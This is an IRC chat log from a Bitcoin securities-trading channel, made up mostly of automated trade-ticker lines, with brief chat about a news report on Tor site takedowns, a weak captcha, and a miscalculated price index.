20:20:50 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Aug 04 20:24:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.04061 BTC [+] Aug 04 20:24:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04069 BTC [+] Aug 04 20:25:44 [HAVELOCK] [AM100] 2 @ 0.03875 = 0.0775 BTC [-] Aug 04 20:25:47 [HAVELOCK] [AM100] 1 @ 0.03875 BTC [-] Aug 04 20:27:11 [BTCTC] [ASICMINER-PT] 4 @ 4.1 = 16.4 BTC [+] Aug 04 20:27:45 [BTCTC] [ASICMINER-PT] 5 @ 4.1 = 20.5 BTC [+] Aug 04 20:28:30 [BTCTC] [ASICMINER-PT] 1 @ 4.101 BTC [+] Aug 04 20:29:28 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [+] Aug 04 20:35:05 [BTCTC] [ACTIVEMINING] 1 @ 0.006203 BTC [+] Aug 04 20:37:41 [HAVELOCK] [SMG] 2 @ 0.0002442 = 0.0005 BTC [-] Aug 04 20:42:18 [HAVELOCK] [HIM] 1 @ 0.151 BTC [+] Aug 04 20:44:37 [HAVELOCK] [AM1] 1 @ 4.13 BTC [+] Aug 04 20:44:38 http://www.twitlonger.com/show/n_1rlo0uu "many" (i have no relation) tor sites taken down, hoster arrested and js exploit installed, tormail included Aug 04 20:44:41 TwitLonger — When you talk too much for Twitter Aug 04 20:44:55 [BTCTC] [ASICMINER-PT] 1 @ 4.14 BTC [+] Aug 04 20:45:48 [BTCTC] [LABCOIN] 1 @ 0.001794 BTC [+] Aug 04 20:45:50 [BTCTC] [LABCOIN] 10 @ 0.001795 = 0.018 BTC [+] Aug 04 20:45:51 [BTCTC] [LABCOIN] 86 @ 0.001796 = 0.1545 BTC [+] Aug 04 20:46:50 [HAVELOCK] [LABCO] 127 @ 0.0018165 = 0.2307 BTC [-] Aug 04 20:47:12 [BTCTC] [ACTIVEMINING] 55 @ 0.0062 = 0.341 BTC [-] Aug 04 20:47:15 [BTCTC] [LABCOIN] 19 @ 0.001797 = 0.0341 BTC [+] Aug 04 20:47:16 [BTCTC] [LABCOIN] 481 @ 0.001797 = 0.8644 BTC [+] Aug 04 20:47:18 dexX7 myeah Aug 04 20:47:32 [HAVELOCK] [XBOND] 225 @ 0.0010699 = 0.2407 BTC [-] Aug 04 20:51:17 [BTCTC] [BASIC-MINING] 3 @ 0.388 = 1.164 BTC [+] Aug 04 20:52:05 unfortunately for the usg, bitcoin is much larger than the united states ever could have been Aug 04 20:52:16 no question by now of ever being that anymore anyway. Aug 04 20:54:26 [BTCTC] [DMS.PURCHASE] 17 @ 0.02824 = 0.4801 BTC [-] Aug 04 20:55:29 [BTCTC] [DMS.SELLING] 13 @ 0.02119 = 0.2755 BTC [-] Aug 04 20:55:30 [BTCTC] [DMS.SELLING] 20 @ 0.02119 = 0.4238 BTC [-] Aug 04 20:56:39 yeah, the conclusion in that tweet is kinda ridiculous Aug 04 20:58:12 [BTCTC] [BASIC-MINING] 1 @ 0.3879 BTC [-] Aug 04 20:58:12 [BTCTC] [BASIC-MINING] 5 @ 0.388 = 1.94 BTC [+] Aug 04 20:59:14 [BTCTC] [ACTIVEMINING] 1 @ 0.006202 BTC [+] Aug 04 20:59:15 [BTCTC] [ACTIVEMINING] 8 @ 0.006239 = 0.0499 BTC [+] Aug 04 20:59:17 [BTCTC] [ACTIVEMINING] 33 @ 0.00624 = 0.2059 BTC [+] Aug 04 20:59:18 [BTCTC] [ACTIVEMINING] 123 @ 0.006319 = 0.7772 BTC [+] Aug 04 20:59:19 [BTCTC] [ACTIVEMINING] 335 @ 0.00632 = 2.1172 BTC [+] Aug 04 20:59:28 still. i guess all the people that wondered why i'm rejecting tor for mpex back during the floods have more reasons to scratch their heads. Aug 04 20:59:50 [BTCTC] [PAJKA.BOND] 18 @ 0.02599 = 0.4678 BTC [+] Aug 04 21:01:47 I wonder why people were using a hoster on TOR, kinda defeats the purpose Aug 04 21:02:12 and it's obviously to hunt down "pedophiles"… yeah right Aug 04 21:04:00 i wonder why people use online wallets for bitcoin, etc Aug 04 21:04:36 [BTCTC] [BTCGARDEN] 200 @ 0.01604 = 3.208 BTC [-] Aug 04 21:04:38 [BTCTC] [BTCGARDEN] 1 @ 0.01604 BTC [-] Aug 04 21:04:39 [BTCTC] [BTCGARDEN] 3 @ 0.01603 = 0.0481 BTC [-] Aug 04 21:04:40 [BTCTC] [BTCGARDEN] 100 @ 0.01603 = 1.603 BTC [-] Aug 04 21:04:42 [BTCTC] [BTCGARDEN] 213 @ 0.01601 = 3.4101 BTC [-] Aug 04 21:04:42 [BTCTC] [BTCGARDEN] 625 @ 0.01601 = 10.0063 BTC [-] Aug 04 21:04:43 [BTCTC] [BTCGARDEN] 87 @ 0.01601 = 1.3929 BTC [-] Aug 04 21:04:44 [BTCTC] [BTCGARDEN] 100 @ 0.01601 = 1.601 BTC [-] Aug 04 21:04:46 [BTCTC] [BTCGARDEN] 15634 @ 0.016 = 250.144 BTC [-] Aug 04 21:04:47 [BTCTC] [BTCGARDEN] 14112 @ 0.016 = 225.792 BTC [-] Aug 04 21:05:16 [BTCTC] [ACTIVEMINING] 15 @ 0.006203 = 0.093 BTC [-] Aug 04 21:05:24 [BTCTC] [BTCGARDEN] 686 @ 0.016 = 10.976 BTC [-] Aug 04 21:05:36 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 04 21:05:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006316 = 0.1579 BTC [+] Aug 04 21:05:47 [BTCTC] [ACTIVEMINING] 4 @ 0.006317 = 0.0253 BTC [+] Aug 04 21:05:49 [BTCTC] [ACTIVEMINING] 50 @ 0.006318 = 0.3159 BTC [+] Aug 04 21:05:49 [BTCTC] [ACTIVEMINING] 30 @ 0.00632 = 0.1896 BTC [+] Aug 04 21:05:50 [BTCTC] [ACTIVEMINING] 130 @ 0.00632 = 0.8216 BTC [+] Aug 04 21:05:51 [BTCTC] [ACTIVEMINING] 20 @ 0.006329 = 0.1266 BTC [+] Aug 04 21:05:52 [BTCTC] [ACTIVEMINING] 80 @ 0.00633 = 0.5064 BTC [+] Aug 04 21:05:53 [BTCTC] [ACTIVEMINING] 26 @ 0.006397 = 0.1663 BTC [+] Aug 04 21:06:01 lol http://i.imgur.com/ul5AsIv.png Aug 04 21:06:56 :) Aug 04 21:07:20 I'm not sure I understand, it's actually easier to break the captcha without using wolfram alpha, who responds using images Aug 04 21:08:09 WA does have some api no? Aug 04 21:08:20 either way the captcha is a joke Aug 04 21:08:57 so far its prooven beyond expectations Aug 04 21:09:24 [BTCTC] [BTCGARDEN] 1682 @ 0.016 = 26.912 BTC [-] Aug 04 21:09:34 [BTCTC] [LABCOIN] 1 @ 0.00176 BTC [-] Aug 04 21:09:35 [BTCTC] [LABCOIN] 16 @ 0.001713 = 0.0274 BTC [-] Aug 04 21:09:36 [BTCTC] [LABCOIN] 100 @ 0.001712 = 0.1712 BTC [-] Aug 04 21:09:38 [BTCTC] [LABCOIN] 71 @ 0.001706 = 0.1211 BTC [-] Aug 04 21:09:39 [BTCTC] [LABCOIN] 2000 @ 0.001705 = 3.41 BTC [-] Aug 04 21:09:39 [BTCTC] [LABCOIN] 47 @ 0.001704 = 0.0801 BTC [-] Aug 04 21:09:40 [BTCTC] [LABCOIN] 1000 @ 0.001704 = 1.704 BTC [-] Aug 04 21:09:41 [BTCTC] [LABCOIN] 5000 @ 0.001704 = 8.52 BTC [-] Aug 04 21:09:42 [BTCTC] [LABCOIN] 1000 @ 0.001704 = 1.704 BTC [-] Aug 04 21:09:43 [BTCTC] [LABCOIN] 2372 @ 0.001703 = 4.0395 BTC [-] Aug 04 21:09:45 [BTCTC] [LABCOIN] 1000 @ 0.001703 = 1.703 BTC [-] Aug 04 21:09:46 [BTCTC] [LABCOIN] 60 @ 0.001702 = 0.1021 BTC [-] Aug 04 21:09:47 [BTCTC] [LABCOIN] 45 @ 0.001701 = 0.0765 BTC [-] Aug 04 21:09:48 [BTCTC] [LABCOIN] 1000 @ 0.001701 = 1.701 BTC [-] Aug 04 21:09:49 [BTCTC] [LABCOIN] 2000 @ 0.001701 = 3.402 BTC [-] Aug 04 21:09:49 [BTCTC] [LABCOIN] 500 @ 0.0017 = 0.85 BTC [-] Aug 04 21:09:50 [BTCTC] [LABCOIN] 150 @ 0.0017 = 0.255 BTC [-] Aug 04 21:09:51 [BTCTC] [LABCOIN] 1113 @ 0.001699 = 1.891 BTC [-] Aug 04 21:09:52 [BTCTC] [LABCOIN] 10000 @ 0.00169 = 16.9 BTC [-] Aug 04 21:09:53 [BTCTC] [LABCOIN] 10000 @ 0.00168 = 16.8 BTC [-] Aug 04 21:09:54 [BTCTC] [LABCOIN] 10000 @ 0.00167 = 16.7 BTC [-] Aug 04 21:09:55 [BTCTC] [LABCOIN] 1909 @ 0.001655 = 3.1594 BTC [-] Aug 04 21:09:57 [BTCTC] [LABCOIN] 300 @ 0.001651 = 0.4953 BTC [-] Aug 04 21:09:58 [BTCTC] [LABCOIN] 5000 @ 0.001651 = 8.255 BTC [-] Aug 04 21:09:59 [BTCTC] [LABCOIN] 6731 @ 0.00164 = 11.0388 BTC [-] Aug 04 21:10:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.04079 BTC [+] Aug 04 21:10:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.0408 = 0.1632 BTC [+] Aug 04 21:10:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04089 = 0.0818 BTC [+] Aug 04 21:10:03 [BTCTC] [TAT.ASICMINER] 15 @ 0.0409 = 0.6135 BTC [+] Aug 04 21:10:05 [BTCTC] [TAT.ASICMINER] 64 @ 0.041 = 2.624 BTC [+] Aug 04 21:11:24 [HAVELOCK] [XBOND] 50 @ 0.0010699 = 0.0535 BTC [-] Aug 04 21:12:39 well the captcha is a failure in the way it's harder for humans than machines… Aug 04 21:12:56 lol true Aug 04 21:13:05 [BTCTC] [KENILWORTH] 9 @ 0.001798 = 0.0162 BTC [-] Aug 04 21:13:06 [BTCTC] [KENILWORTH] 14 @ 0.001798 = 0.0252 BTC [-] Aug 04 21:14:21 not the one in question Aug 04 21:14:31 you just gotta do it once Aug 04 21:14:54 pankkake actually it probably is. Aug 04 21:15:05 [BTCTC] [LABCOIN] 14 @ 0.001783 = 0.025 BTC [+] Aug 04 21:15:20 kakobrekla lol. Aug 04 21:15:27 my thought process would be "how do roman numbers work again… oh well fuck it" Aug 04 21:15:30 if people were in on all the jokes would there still be lolz to be had ? Aug 04 21:16:06 [BTCTC] [BTCGARDEN] 16 @ 0.0161 = 0.2576 BTC [+] Aug 04 21:16:07 [BTCTC] [BTCGARDEN] 150 @ 0.01601 = 2.4015 BTC [-] Aug 04 21:16:08 either way the captcha is a joke / so far its prooven beyond expectations << probably tiome to start a bash.assets ? Aug 04 21:16:30 i was thinking about that a few months ago Aug 04 21:16:48 then thestringpuller can add all my shit. Aug 04 21:17:22 "Ken. I love you." Aug 04 21:17:35 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [-] Aug 04 21:17:48 "I applaud your prioritizing skills, Ken." Aug 04 21:17:55 [BTCTC] [BTCGARDEN] 268 @ 0.016 = 4.288 BTC [-] Aug 04 21:18:02 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [-] Aug 04 21:18:03 [BTCTC] [BTCGARDEN] 262 @ 0.016 = 4.192 BTC [-] Aug 04 21:18:12 pankkake hm, ? Aug 04 21:18:26 from the ActiveMining thread Aug 04 21:18:54 http://24.media.tumblr.com/695945e469edc7d2b7d6a863a8071a97/tumblr_mkps0ztciH1s7svwro1_500.gif Aug 04 21:19:46 [BTCTC] [LABCOIN] 12 @ 0.001642 = 0.0197 BTC [-] Aug 04 21:19:47 [BTCTC] [LABCOIN] 23 @ 0.001642 = 0.0378 BTC [-] Aug 04 21:19:53 [BTCTC] [LABCOIN] 300 @ 0.001642 = 0.4926 BTC [-] Aug 04 21:20:10 you saved it lol Aug 04 21:21:29 [BTCTC] [BTCGARDEN] 192 @ 0.016 = 3.072 BTC [-] Aug 04 21:21:41 [BTCTC] [BASIC-MINING] 1 @ 0.3927 BTC [+] Aug 04 21:21:42 [BTCTC] [BASIC-MINING] 4 @ 0.4044 = 1.6176 BTC [+] Aug 04 21:24:02 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [-] Aug 04 21:25:02 [BTCTC] [ASICMINER-PT] 1 @ 4.176 BTC [+] Aug 04 21:25:03 [BTCTC] [ASICMINER-PT] 1 @ 4.18 BTC [+] Aug 04 21:25:05 [BTCTC] [ASICMINER-PT] 1 @ 4.199 BTC [+] Aug 04 21:25:06 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Aug 04 21:25:06 [BTCTC] [ASICMINER-PT] 8 @ 4.2 = 33.6 BTC [+] Aug 04 21:25:08 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [+] Aug 04 21:25:09 [BTCTC] [ASICMINER-PT] 1 @ 4.224 BTC [+] Aug 04 21:25:11 [BTCTC] [ASICMINER-PT] 9 @ 4.235 = 38.115 BTC [+] Aug 04 21:25:14 [BTCTC] [ASICMINER-PT] 4 @ 4.24 = 16.96 BTC [+] Aug 04 21:25:15 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [+] Aug 04 21:25:17 [BTCTC] [ASICMINER-PT] 2 @ 4.249 = 8.498 BTC [+] Aug 04 21:25:18 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [+] Aug 04 21:28:28 [BTCTC] [TAT.ASICMINER] 79 @ 0.041 = 3.239 BTC [+] Aug 04 21:28:37 [HAVELOCK] [SDSTM] 50 @ 0.006 = 0.3 BTC [-] Aug 04 21:28:40 [BTCTC] [ASICMINER-PT] 1 @ 4.266 BTC [+] Aug 04 21:28:51 [HAVELOCK] [SDSTM] 22 @ 0.0051 = 0.1122 BTC [-] Aug 04 21:29:10 [HAVELOCK] [SDSTM] 200 @ 0.0051 = 1.02 BTC [-] Aug 04 21:29:21 [BTCTC] [ASICMINER-PT] 1 @ 4.266 BTC [+] Aug 04 21:29:37 [HAVELOCK] [SDSTM] 728 @ 0.005 = 3.64 BTC [-] Aug 04 21:29:41 [HAVELOCK] [AM1] 1 @ 4.14999998 BTC [+] Aug 04 21:30:21 [BTCTC] [LABCOIN] 100 @ 0.001641 = 0.1641 BTC [-] Aug 04 21:30:23 [BTCTC] [LABCOIN] 900 @ 0.001641 = 1.4769 BTC [-] Aug 04 21:31:18 [BTCTC] [LABCOIN] 100 @ 0.001642 = 0.1642 BTC [+] Aug 04 21:31:19 [BTCTC] [LABCOIN] 1700 @ 0.001641 = 2.7897 BTC [-] Aug 04 21:31:21 [BTCTC] [LABCOIN] 3200 @ 0.00164 = 5.248 BTC [-] Aug 04 21:32:09 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 04 21:33:07 [HAVELOCK] [XBOND] 225 @ 0.0010699 = 0.2407 BTC [-] Aug 04 21:33:10 [BTCTC] [ASICMINER-PT] 1 @ 4.27 BTC [+] Aug 04 21:33:11 [BTCTC] [ASICMINER-PT] 1 @ 4.271 BTC [+] Aug 04 21:33:12 [BTCTC] [ASICMINER-PT] 1 @ 4.273 BTC [+] Aug 04 21:33:14 [BTCTC] [ASICMINER-PT] 5 @ 4.29 = 21.45 BTC [+] Aug 04 21:33:15 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Aug 04 21:33:16 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Aug 04 21:33:17 [BTCTC] [ASICMINER-PT] 9 @ 4.339 = 39.051 BTC [+] Aug 04 21:33:19 [BTCTC] [ASICMINER-PT] 2 @ 4.348 = 8.696 BTC [+] Aug 04 21:33:20 [BTCTC] [ASICMINER-PT] 4 @ 4.348 = 17.392 BTC [+] Aug 04 21:33:21 [BTCTC] [ASICMINER-PT] 1 @ 4.349 BTC [+] Aug 04 21:33:22 [BTCTC] [ASICMINER-PT] 22 @ 4.35 = 95.7 BTC [+] Aug 04 21:33:31 [BTCTC] [LABCOIN] 49 @ 0.00164 = 0.0804 BTC [-] Aug 04 21:33:32 [BTCTC] [LABCOIN] 200 @ 0.001637 = 0.3274 BTC [-] Aug 04 21:33:34 [BTCTC] [LABCOIN] 2751 @ 0.001637 = 4.5034 BTC [-] Aug 04 21:34:22 [BTCTC] [LABCOIN] 249 @ 0.001637 = 0.4076 BTC [-] Aug 04 21:34:24 [BTCTC] [LABCOIN] 50 @ 0.001633 = 0.0817 BTC [-] Aug 04 21:34:25 [BTCTC] [LABCOIN] 1701 @ 0.001633 = 2.7777 BTC [-] Aug 04 21:34:43 [BTCTC] [BTCGARDEN] 614 @ 0.016 = 9.824 BTC [-] Aug 04 21:34:45 [BTCTC] [BTCGARDEN] 380 @ 0.016 = 6.08 BTC [-] Aug 04 21:34:46 [BTCTC] [BTCGARDEN] 313 @ 0.016 = 5.008 BTC [-] Aug 04 21:34:47 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 04 21:34:47 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 04 21:34:49 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 04 21:34:50 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [-] Aug 04 21:34:51 [BTCTC] [BTCGARDEN] 20 @ 0.0159 = 0.318 BTC [-] Aug 04 21:34:52 [BTCTC] [BTCGARDEN] 5 @ 0.01581 = 0.0791 BTC [-] Aug 04 21:34:53 [BTCTC] [BTCGARDEN] 691 @ 0.01581 = 10.9247 BTC [-] Aug 04 21:34:54 [BTCTC] [BTCGARDEN] 2 @ 0.0158 = 0.0316 BTC [-] Aug 04 21:34:55 [BTCTC] [BTCGARDEN] 5455 @ 0.0158 = 86.189 BTC [-] Aug 04 21:35:33 [BTCTC] [LABCOIN] 226 @ 0.001756 = 0.3969 BTC [+] Aug 04 21:36:04 [BTCTC] [ACTIVEMINING] 106 @ 0.006384 = 0.6767 BTC [-] Aug 04 21:36:04 [BTCTC] [ACTIVEMINING] 50 @ 0.006385 = 0.3193 BTC [+] Aug 04 21:36:06 [BTCTC] [ACTIVEMINING] 100 @ 0.006386 = 0.6386 BTC [+] Aug 04 21:36:07 [BTCTC] [ACTIVEMINING] 244 @ 0.00639 = 1.5592 BTC [+] Aug 04 21:36:36 [BTCTC] [ASICMINER-PT] 1 @ 4.394 BTC [+] Aug 04 21:36:38 [BTCTC] [ASICMINER-PT] 1 @ 4.395 BTC [+] Aug 04 21:36:39 [BTCTC] [ASICMINER-PT] 1 @ 4.396 BTC [+] Aug 04 21:36:40 [BTCTC] [ASICMINER-PT] 2 @ 4.397 = 8.794 BTC [+] Aug 04 21:36:41 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Aug 04 21:36:42 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Aug 04 21:36:44 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Aug 04 21:37:50 [BTCTC] [ASICMINER-PT] 1 @ 4.403 BTC [+] Aug 04 21:37:51 [BTCTC] [ASICMINER-PT] 1 @ 4.405 BTC [+] Aug 04 21:37:52 [BTCTC] [ASICMINER-PT] 5 @ 4.45 = 22.25 BTC [+] Aug 04 21:38:23 [HAVELOCK] [SMG] 70 @ 0.0002442 = 0.0171 BTC [-] Aug 04 21:38:26 [HAVELOCK] [XBOND] 2101 @ 0.00105 = 2.2061 BTC [-] Aug 04 21:38:28 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Aug 04 21:38:34 [BTCTC] [TAT.ASICMINER] 33 @ 0.041 = 1.353 BTC [+] Aug 04 21:38:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.041 = 0.41 BTC [+] Aug 04 21:38:39 [HAVELOCK] [AM1] 1 @ 4.14999998 BTC [+] Aug 04 21:39:19 [BTCTC] [LABCOIN] 2 @ 0.001751 = 0.0035 BTC [-] Aug 04 21:39:38 [BTCTC] [ACTIVEMINING] 30 @ 0.006382 = 0.1915 BTC [-] Aug 04 21:40:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.04142 = 0.2899 BTC [+] Aug 04 21:40:18 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Aug 04 21:40:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.04142 = 0.4142 BTC [+] Aug 04 21:40:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.04143 = 2.0715 BTC [+] Aug 04 21:40:32 [BTCTC] [TAT.ASICMINER] 45 @ 0.04179 = 1.8806 BTC [+] Aug 04 21:40:44 [BTCTC] [BTCGARDEN] 125 @ 0.01582 = 1.9775 BTC [+] Aug 04 21:41:55 btcgarden 30 btc till .01 Aug 04 21:42:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.04179 = 0.209 BTC [+] Aug 04 21:42:48 [BTCTC] [LABCOIN] 216 @ 0.001634 = 0.3529 BTC [-] Aug 04 21:42:50 [BTCTC] [LABCOIN] 299 @ 0.001633 = 0.4883 BTC [-] Aug 04 21:42:51 [BTCTC] [LABCOIN] 485 @ 0.001633 = 0.792 BTC [-] Aug 04 21:43:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.0419 = 0.838 BTC [+] Aug 04 21:43:15 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Aug 04 21:43:24 [BTCTC] [LABCOIN] 500 @ 0.001633 = 0.8165 BTC [-] Aug 04 21:43:25 [BTCTC] [BTCGARDEN] 3 @ 0.01551 = 0.0465 BTC [-] Aug 04 21:43:48 [BTCTC] [TAT.ASICMINER] 30 @ 0.0419 = 1.257 BTC [+] Aug 04 21:44:24 [BTCTC] [ASICMINER-PT] 4 @ 4.301 = 17.204 BTC [+] Aug 04 21:44:42 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [+] Aug 04 21:44:43 [BTCTC] [ASICMINER-PT] 10 @ 4.3 = 43 BTC [-] Aug 04 21:45:09 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Aug 04 21:45:09 https://forums.eveonline.com/default.aspx?g=posts&m=3443622&#post3443622 Aug 04 21:45:13 BP Copying/Invention slots @ Iro POS open - Sell Orders - EVE Online Forums Aug 04 21:45:14 don't i just kick ass ? Aug 04 21:45:41 [BTCTC] [BTCGARDEN] 5 @ 0.0155 = 0.0775 BTC [-] Aug 04 21:45:44 [BTCTC] [BTCGARDEN] 45 @ 0.0155 = 0.6975 BTC [-] Aug 04 21:45:46 [BTCTC] [BTCGARDEN] 50 @ 0.0155 = 0.775 BTC [-] Aug 04 21:45:46 [BTCTC] [BTCGARDEN] 100 @ 0.0154 = 1.54 BTC [-] Aug 04 21:45:48 [BTCTC] [BTCGARDEN] 110 @ 0.01533 = 1.6863 BTC [-] Aug 04 21:45:52 [BTCTC] [BTCGARDEN] 5 @ 0.01532 = 0.0766 BTC [-] Aug 04 21:46:20 [HAVELOCK] [XBOND] 6 @ 0.00107 = 0.0064 BTC [+] Aug 04 21:46:52 [BTCTC] [BTCGARDEN] 190 @ 0.0155 = 2.945 BTC [+] Aug 04 21:46:56 [BTCTC] [BTCGARDEN] 110 @ 0.0155 = 1.705 BTC [+] Aug 04 21:48:34 [BTCTC] [BTCGARDEN] 10 @ 0.0155 = 0.155 BTC [+] Aug 04 21:49:09 garden tanking Aug 04 21:49:46 damn asicminer burped and dcx index went through the roof, wtf Aug 04 21:49:54 Dunno not even a 1000 shares Aug 04 21:49:56 somethings broken i think Aug 04 21:50:18 wow i didnt even notice am Aug 04 21:50:40 [HAVELOCK] [XBOND] 12500 @ 0.00105 = 13.125 BTC [-] Aug 04 21:51:08 how much did it go up? 4.1 to 4.45 (max), right? Aug 04 21:51:16 [BTCTC] [BTCGARDEN] 20 @ 0.01512 = 0.3024 BTC [-] Aug 04 21:51:18 [BTCTC] [BTCGARDEN] 94 @ 0.01511 = 1.4203 BTC [-] Aug 04 21:51:25 tanking hard Aug 04 21:51:41 [BTCTC] [BTCGARDEN] 6 @ 0.01511 = 0.0907 BTC [-] Aug 04 21:51:43 [BTCTC] [BTCGARDEN] 11 @ 0.0151 = 0.1661 BTC [-] Aug 04 21:51:43 [BTCTC] [BTCGARDEN] 33 @ 0.01505 = 0.4967 BTC [-] Aug 04 21:51:44 [BTCTC] [BTCGARDEN] 50 @ 0.01504 = 0.752 BTC [-] Aug 04 21:51:54 thats 8.5%, yet the index also went up like 8% http://dcx.smidge.com Aug 04 21:52:05 did something else go up this hour? Aug 04 21:52:15 am Aug 04 21:52:31 yes i know, i mean another security Aug 04 21:52:38 besides am Aug 04 21:52:55 you just cant beat realstic valuations Aug 04 21:53:10 nothing really remarkable asmidge Aug 04 21:53:17 im trying to figure out what sent the index up 8% when am is "only" 50% of the index Aug 04 21:53:29 hm, the formula seems fine Aug 04 21:54:11 smidge you scammer Aug 04 21:54:50 well am went from ~4 to 4.3 Aug 04 21:54:54 heh Aug 04 21:55:04 daily high 4.45 Aug 04 21:55:06 no it went from 4.1 to 4.45 Aug 04 21:55:08 yep Aug 04 21:55:15 8.5% Aug 04 21:55:21 smidge is scammin' us with his indices Aug 04 21:55:23 ;;next Aug 04 21:55:23 See latest update from Onefixt here: https://twitter.com/BitcoinOracle/ Aug 04 21:55:37 ;;google https://twitter.com/BitcoinOracle/ Aug 04 21:55:37 Bitcoin-Analysis (BitcoinOracle) on Twitter: ; Bitcoin Chat Rooms - Bitcoin Chat (Currencies) - irc2go.com: ; bitcoin-analysis freenode - Internet Relay Chat: Aug 04 21:55:40 thestringpuller you better take it slow, or i'll ipo it Aug 04 21:55:49 :) Aug 04 21:56:05 I only invest in private things. Aug 04 21:56:06 [HAVELOCK] [XBOND] 10992 @ 0.00105 = 11.5416 BTC [-] Aug 04 21:56:10 [BTCTC] [BASIC-MINING] 2 @ 0.4024 = 0.8048 BTC [-] Aug 04 21:56:12 Or stuff I have inside information on. Aug 04 21:56:18 can i buy some smidge Aug 04 21:56:21 then this is for you Aug 04 21:56:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.04193 = 0.2516 BTC [+] Aug 04 21:56:27 arij no Aug 04 21:56:39 serious? Aug 04 21:56:47 hehe of course you can Aug 04 21:57:06 Tat am was around .036 yesterday, that would of been a great snag Aug 04 21:57:15 but let me fix our reference index 1st Aug 04 21:57:17 :) Aug 04 21:58:25 [BTCTC] [ASICMINER-PT] 1 @ 4.266 BTC [-] Aug 04 21:58:29 [BTCTC] [BTCGARDEN] 60 @ 0.01504 = 0.9024 BTC [-] Aug 04 21:58:31 [BTCTC] [BTCGARDEN] 2 @ 0.01504 = 0.0301 BTC [-] Aug 04 21:58:33 [BTCTC] [BTCGARDEN] 8 @ 0.01504 = 0.1203 BTC [-] Aug 04 21:58:38 [BTCTC] [BTCGARDEN] 2 @ 0.01503 = 0.0301 BTC [-] Aug 04 21:58:40 [BTCTC] [BTCGARDEN] 250 @ 0.01502 = 3.755 BTC [-] Aug 04 21:58:42 [BTCTC] [BTCGARDEN] 47 @ 0.01501 = 0.7055 BTC [-] Aug 04 21:58:42 [BTCTC] [BTCGARDEN] 15 @ 0.015 = 0.225 BTC [-] Aug 04 21:58:44 [BTCTC] [BTCGARDEN] 217 @ 0.015 = 3.255 BTC [-] Aug 04 21:58:57 ciphermine was stable too, at 5.3 ltc Aug 04 21:59:47 i dont get it Aug 04 21:59:59 did the number of outstanding shares change? Aug 04 22:00:13 i am not getting those dynamically Aug 04 22:00:22 fixed value in db Aug 04 22:00:28 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Aug 04 22:00:29 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [+] Aug 04 22:00:31 [BTCTC] [ASICMINER-PT] 2 @ 4.349 = 8.698 BTC [+] Aug 04 22:00:32 [BTCTC] [ASICMINER-PT] 5 @ 4.35 = 21.75 BTC [+] Aug 04 22:00:33 [BTCTC] [ASICMINER-PT] 5 @ 4.364 = 21.82 BTC [+] Aug 04 22:00:34 [BTCTC] [ASICMINER-PT] 2 @ 4.369 = 8.738 BTC [+] Aug 04 22:00:35 [BTCTC] [ASICMINER-PT] 4 @ 4.37 = 17.48 BTC [+] Aug 04 22:00:36 [BTCTC] [ASICMINER-PT] 10 @ 4.38 = 43.8 BTC [+] Aug 04 22:00:37 [BTCTC] [ASICMINER-PT] 1 @ 4.397 BTC [+] Aug 04 22:00:39 [BTCTC] [ASICMINER-PT] 3 @ 4.4 = 13.2 BTC [+] Aug 04 22:00:39 [BTCTC] [ASICMINER-PT] 50 @ 4.433 = 221.65 BTC [+] Aug 04 22:00:54 [BTCTC] [BTCGARDEN] 691 @ 0.015 = 10.365 BTC [-] Aug 04 22:01:28 [BTCTC] [ACTIVEMINING] 25 @ 0.006301 = 0.1575 BTC [-] Aug 04 22:01:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.0063 = 6.3 BTC [-] Aug 04 22:01:34 why would anyone want to sell at less than ipo? Aug 04 22:01:43 [BTCTC] [BTCGARDEN] 33 @ 0.01501 = 0.4953 BTC [+] Aug 04 22:01:46 [HAVELOCK] [AM1] 1 @ 4.19000001 BTC [+] Aug 04 22:01:55 panic Aug 04 22:01:57 impatience or the need for coins Aug 04 22:02:02 the golden turd that was just a turd? Aug 04 22:02:06 [BTCTC] [BTCGARDEN] 73 @ 0.01501 = 1.0957 BTC [+] Aug 04 22:02:37 [HAVELOCK] [AM100] 2 @ 0.03875 = 0.0775 BTC [-] Aug 04 22:02:39 [HAVELOCK] [AM100] 48 @ 